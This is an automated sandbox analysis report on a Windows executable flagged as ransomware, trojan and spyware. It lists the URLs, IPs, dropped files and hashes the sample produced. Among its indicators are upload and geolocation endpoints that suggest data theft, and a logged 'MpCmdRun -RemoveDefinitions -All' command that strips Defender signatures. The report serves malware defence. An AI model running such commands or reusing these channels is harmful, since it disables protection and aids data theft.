                                                                                                                                                                                  https://discordapp.com/api/v9/users/ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_sourceahost.exe, 00000002.00000002.1869186848.000002162B824000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                      http://ip-api.com/json/?fields=225545rahost.exe, 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ahost.exe, 00000002.00000002.1869730521.000002162BEEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_specahost.exe, 00000002.00000002.1869186848.000002162B7A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                            https://github.com/urllib3/urllib3/issues/2920ahost.exe, 00000002.00000002.1871841090.000002162C780000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                              http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                https://api.gofile.io/getServerr~rahost.exe, 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_dataahost.exe, 00000002.00000002.1869508336.000002162B9B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    https://yahoo.com/ahost.exe, 00000002.00000003.1549319883.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1559624480.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1599255972.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1632395515.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1577999241.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1605942422.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1869730521.000002162BD46000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1870964943.000002162C342000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      https://account.bellmedia.cahost.exe, 00000002.00000002.1874902804.000002162D8F8000.00000004.00001000.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1618434399.000002162D061000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1602338590.000002162D061000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1632068064.000002162D05C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1596519190.000002162D05C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1642271166.000002162D061000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1873852301.000002162D05C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1866135475.000002162D05C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6ahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          https://login.microsoftonline.comahost.exe, 00000002.00000002.1874902804.000002162D8D8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            http://crl.thawte.com/ThawteTimestampingCA.crl0ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              https://html.spec.whatwg.org/multipage/ahost.exe, 00000002.00000003.1549319883.000002162C268000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1601685173.000002162C268000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1633476242.000002162C268000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1643405350.000002162C268000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1870768302.000002162C268000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1613125448.000002162C268000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1559624480.000002162C268000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C268000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                https://www.ifeng.com/ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsahost.exe, 00000002.00000002.1871698270.000002162C660000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchahost.exe, 00000002.00000002.1869730521.000002162BEEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      https://www.rfc-editor.org/rfc/rfc8259#section-8.1ahost.exe, 00000002.00000002.1869730521.000002162BD46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        https://contoso.com/powershell.exe, 00000046.00000002.1715027533.0000017B11654000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          https://oneget.orgXpowershell.exe, 00000046.00000002.1646857023.0000017B02D49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                            208.95.112.1
                                                                                                                                                                                                                            ip-api.comUnited States
                                                                                                                                                                                                                            53334TUT-ASUStrue
                                                                                                                                                                                                                            162.159.135.232
                                                                                                                                                                                                                            discord.comUnited States
                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                            IP
                                                                                                                                                                                                                            127.0.0.1
                                                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                            Analysis ID:1574323
                                                                                                                                                                                                                            Start date and time:2024-12-13 08:36:13 +01:00
                                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                            Overall analysis duration:0h 13m 17s
                                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                            Number of analysed new started processes analysed:126
                                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                                            Sample name:ahost.exe
                                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                                            Classification:mal100.rans.troj.adwa.spyw.expl.evad.winEXE@196/60@4/3
                                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                                            • Successful, ratio: 50%
                                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                                            • Successful, ratio: 89%
                                                                                                                                                                                                                            • Number of executed functions: 118
                                                                                                                                                                                                                            • Number of non-executed functions: 174
                                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 172.217.19.227, 23.218.208.109, 20.12.23.50
                                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, gstatic.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                            • Execution Graph export aborted for target mshta.exe, PID 7572 because there are no executed function
                                                                                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 7440 because it is empty
                                                                                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 7600 because it is empty
                                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                            • VT rate limit hit for: ahost.exe
                                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                                            02:37:13API Interceptor8x Sleep call for process: WMIC.exe modified
                                                                                                                                                                                                                            02:37:15API Interceptor151x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                            02:37:18API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1310720
                                                                                                                                                                                                                            Entropy (8bit):0.4932370545546512
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1ZtaH:cJhXC9lHmutpJyiRDeJ/aUKrDgnmB
                                                                                                                                                                                                                            MD5:F8F9530627DDFB2E390536EAD07638B4
                                                                                                                                                                                                                            SHA1:27664870B24CCF726CF2F6E05B0CF8BD95302E70
                                                                                                                                                                                                                            SHA-256:1EB4D6FC051C3A0A524FFF6D753822C726F07D53CD8632DE71E4D3415C5465DA
                                                                                                                                                                                                                            SHA-512:D758F08CACE679032187064C8C4FB7A1114D903A968984731FF55C876DF80C33E48680E54387C20B73333D696B4CA559C05864DB5876BFF2012E665A0A580F0E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:^.;V........@..@-....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................&.#.\.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0xa3dd87e5, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1310720
                                                                                                                                                                                                                            Entropy (8bit):0.7217375972350385
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:7SB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:7azaNvFv8V2UW/DLzN/w4wZi
                                                                                                                                                                                                                            MD5:7926B6C904DA97FEC6B228B03673E92C
                                                                                                                                                                                                                            SHA1:336197B2228B4FB645EADB9A645908E40C37C033
                                                                                                                                                                                                                            SHA-256:3C4304942BF2FCBF913C4EA06AAE51468985659ACB083664FAD0918A56A431D4
                                                                                                                                                                                                                            SHA-512:1CA2442D459DDCBA3F287FA6AD4F5EAB1459EE27C3D824233C038C59886AF6D83F31BFD9323BB3EA2DF7953ED3F65CC88F3E00C1FD90C84B3FC998F393F40B38
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:...... ...............X\...;...{......................p.D..........{}..%...|..h.F.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......-....{...............................................................................................................................................................................................2...{....................................u+.%...|...................../.%...|...........................#......h.F.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):16384
                                                                                                                                                                                                                            Entropy (8bit):0.08127735467866633
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:3tKYeAHTgClw/fgsCrZClW/tvk3HgYlXall+SHY/Xl+/rQLve:3tKz4Rlwfgs3GhIeAS4M
                                                                                                                                                                                                                            MD5:A9218EA51DBA1C89959FEA885CEDBE64
                                                                                                                                                                                                                            SHA1:B2612020EB9866B29CABB915C3D00A7FFC277414
                                                                                                                                                                                                                            SHA-256:2FC40A1013C54A1DE7836564FC6A8AE4BE19188568189F60612B77A3C1E3E70E
                                                                                                                                                                                                                            SHA-512:D8F98AB513FDF47A6082D966AA4C413B19F73441CD2C372C9988758B51855338B512BF500083DC9CFF17C573E7FE54B4D7319361BA2262133ECDE4D50D3C2943
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:.H.e.....................................;...{...%...|.......{}..............{}......{}.vv_Q.....{}..................../.%...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                                                                            Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:@...e...........................................................
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):675060
                                                                                                                                                                                                                            Entropy (8bit):7.924951140329618
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:nT1F1JLeJUvn8uIU4gH6zcuJVgV9zDgRLkXeHGq0d/MBxqCqz0uLrpa:TllHnLIU4gH6tSV9zkRLdL0d/yxqRLM
                                                                                                                                                                                                                            MD5:1D18983F56200EAF9F93570AFEB13EB1
                                                                                                                                                                                                                            SHA1:7869E91BB90ED5E23B47B8886B0A1DE7B2C10295
                                                                                                                                                                                                                            SHA-256:55B72982D018D0CDA7A96EA288CDFA59AF0610AF9709EF76A61AB79814172BB4
                                                                                                                                                                                                                            SHA-512:0E18AF796E5F8EB835AE9C55D8360C6C6378B72D77CAC6A6D962005D21255D297E8E66AB3B8D5D5931F046DB6286889AB5629A166E15874048A7F232C323505C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..g..Wu...}.,\.\}.........t..FwU...\.C.$.,!.A....M..l.6Y.l.A"..*.-.P..,D.H..L6.......}..{...9...}..|c<c.5.\k.s>.H..}G..~.-....3(...(..r..._..k.................3....q.^.d...Yy.*.W|....*.-..]...o....zK..,g.G.<0......y_..+/.o.e..r..V^.y./......g...M.1.lF...X...3...LX."....Xy../...2../,.J..Ywn..3??a.3..V~..k.?..<]...0>....v<...+O...<.b....>.!V..9.....hX..O.<../.HX..R...O.......'..U..}b.;....Wv<.g.Q......|...6.a|...k.....G~t...2a.#>........=.n..?..<..5.x.....TGbqn...;.v.:a......Zx...n>..w..{VJ~.Y=;.R.].-g..6...]_q....&......}V9...u;.tm.....!.v.u}..~......3K.<.(.{.u..i.v.S..F.\]..w?.|..s-.3.:.no..S.].J..n..|t.5.zG9g.....c+...[...S..v.Z..`..%w.U........qC...rn..Z.....,.te7>.:.x@.>'_QYy......L`..O-.U....u.N.....s.q/#1.{.......pE.]..yR9..r.....rS.X.'.|...q.Uv.....9..._^i..W.=.|.1..V....w._.o....K'..c...+.9x.{...W..[r..et...Rw.....91.8y ....;/.X.|t.E.
                                                                                                                                                                                                                            Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                            Size (bytes):894
                                                                                                                                                                                                                            Entropy (8bit):3.1131303970183217
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:Q58KRBubdpkoPAGdjrN7K80k9+MlWlLehW51IC07K8t:QOaqdmOFdjrc83+kWResLIE8t
                                                                                                                                                                                                                            MD5:EF4A00B4A725B8DD32D64D958ADDB350
                                                                                                                                                                                                                            SHA1:3F255F03DEFF2FD26283FE34B3FCEA66835513B7
                                                                                                                                                                                                                            SHA-256:7080E671D409E31ABB83EAB3BADAA675AD832110D52864096B7145CBC45EF859
                                                                                                                                                                                                                            SHA-512:B360106FEB9C7CB592653FFD9788573BA456F16F10F47DC8EC6EA3AC38E180A53B14BD0F3CF43D15A500701EEAB46028B940BF2D2A2AFB3ED709BD6AB338784D
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. D.e.c. .. 1.3. .. 2.0.2.4. .0.2.:.3.7.:.2.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. F.r.i. .. D.e.c. .. 1.3. .. 2.0.2.4. .0.2.:.3.7.:.2.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....
                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Fri Dec 13 09:11:16 2024, 1st section name ".debug$S"
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1372
                                                                                                                                                                                                                            Entropy (8bit):4.098025864672031
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:HyFq9HrwZOTXawZHXwK9GMwZtxNwI+ycuZhNRakSvPNnqS+d:SqwZO+wZAKdwZPm1ulRa3tqSe
                                                                                                                                                                                                                            MD5:0412FD62083EC5479B1C31960085E5B7
                                                                                                                                                                                                                            SHA1:82D36B28E8DC23FED93C9DAF97BE22AF0B3EC386
                                                                                                                                                                                                                            SHA-256:78575C2FB9EFD747DF26CD1B6A740A1B8B2F8DB721CB1EEA264C82FC9C65548E
                                                                                                                                                                                                                            SHA-512:88DA5391220C6EC28895842A8F1154060D2E0527BC63F761932F1EBFAB4778615FCB79ED0885965A778AA1AA2630F27B8A6E240B67AB6F5BC837282DA8658952
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:L...4.[g.............debug$S........x...................@..B.rsrc$01........X.......\...........@..@.rsrc$02........P...f...............@..@........R....c:\Users\user\AppData\Local\Temp\ohbt5slp\CSC3D7213846C3143A1A5A1261A2A30979.TMP..................2*.T..)..m...`...........3.......C:\Users\user\AppData\Local\Temp\RES46FF.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.h.b.t.5.s.l.p...d.l.l.....(.....L.e.g.a.
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\ahost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):120400
                                                                                                                                                                                                                            Entropy (8bit):6.6017475353076716
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
                                                                                                                                                                                                                            MD5:862F820C3251E4CA6FC0AC00E4092239
                                                                                                                                                                                                                            SHA1:EF96D84B253041B090C243594F90938E9A487A9A
                                                                                                                                                                                                                            SHA-256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
                                                                                                                                                                                                                            SHA-512:2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\ahost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):49424
                                                                                                                                                                                                                            Entropy (8bit):7.815740675307968
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:esvzuaVl+ztlrpqKgHrzwTzjT+KyH9qtztKnb3/+u2xmFepwUIJLV1/DU5YiSyvX:huaugLzUz+lOsnb33lUIJLV1i7SyFB
                                                                                                                                                                                                                            MD5:58FC4C56F7F400DE210E98CCB8FDC4B2
                                                                                                                                                                                                                            SHA1:12CB7EC39F3AF0947000295F4B50CBD6E7436554
                                                                                                                                                                                                                            SHA-256:DFC195EBB59DC5E365EFD3853D72897B8838497E15C0977B6EDB1EB347F13150
                                                                                                                                                                                                                            SHA-512:AD0C6A9A5CA719D244117984A06CCE8E59ED122855E4595DF242DF18509752429389C3A44A8BA0ABC817D61E37F64638CCBDFFC17238D4C38D2364F0A10E6BC7
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!m..!m..!m..(.o.+m..1...#m..1..."m..1...%m..1...)m..1...,m..i..."m..j...#m..!m..|m..i...)m..i... m..i... m..i... m..Rich!m..........PE..d.....g.........." ...).............d....................................................`.............................................H.................... .. ...................................................p..@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\ahost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):64272
                                                                                                                                                                                                                            Entropy (8bit):7.834005148796091
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:Opx/sXWpBktLQ+ndnJZLIDdwXtRg1zk1+3XTkIJyPeB7SyFmhz:OXsXWpBgLBndJSdIgpk1+3XwIJyPeBrm
                                                                                                                                                                                                                            MD5:79879C679A12FAC03F472463BB8CEFF7
                                                                                                                                                                                                                            SHA1:B530763123BD2C537313E5E41477B0ADC0DF3099
                                                                                                                                                                                                                            SHA-256:8D1A21192112E13913CB77708C105034C5F251D64517017975AF8E0C4999EBA3
                                                                                                                                                                                                                            SHA-512:CA19DDAEFC9AB7C868DD82008A79EA457ACD71722FEC21C2371D51DCFDB99738E79EFF9B1913A306DBEDACB0540CA84A2EC31DC2267C7B559B6A98B390C5F3A7
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
